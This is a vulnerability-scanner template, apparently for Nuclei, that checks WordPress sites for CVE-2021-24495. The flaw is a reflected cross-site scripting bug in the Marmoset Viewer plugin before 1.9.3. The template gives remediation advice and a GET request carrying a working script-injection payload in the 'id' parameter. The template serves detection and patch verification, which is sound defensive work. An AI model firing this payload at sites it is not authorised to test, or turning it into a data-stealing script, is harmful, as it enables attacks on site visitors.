id: CVE-2021-24495 info: name: Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting author: johnjhacking severity: medium description: WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page. remediation: | Update the Wordpress Marmoset Viewer plugin to version 1.9.3 or later to mitigate the vulnerability. reference: - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - https://wordpress.org/plugins/marmoset-viewer/#developers - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638 - https://nvd.nist.gov/vuln/detail/CVE-2021-24495 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24495 cwe-id: CWE-79 epss-score: 0.00116 epss-percentile: 0.45113 cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: marmoset product: marmoset_viewer framework: wordpress tags: xss,wpscan,cve,cve2021,wp-plugin,wordpress,intrusive http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://" - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a" matchers-condition: and matchers: - type: word part: body words: - - alert(/{{randstr}}/) condition: or - type: word words: - Marmoset Viewer - type: status status: - 200 # digest: 490a004630440220204e0c01e805234c4f5e955c28d85f29d5de12a9a60fbc883256449510f97d50022021831b6d9d8b62e92a26393244c2a1da0a23e099ea9ee8008a3fa1cf63f283b5:922c64590222798bb761d5b6d8e72950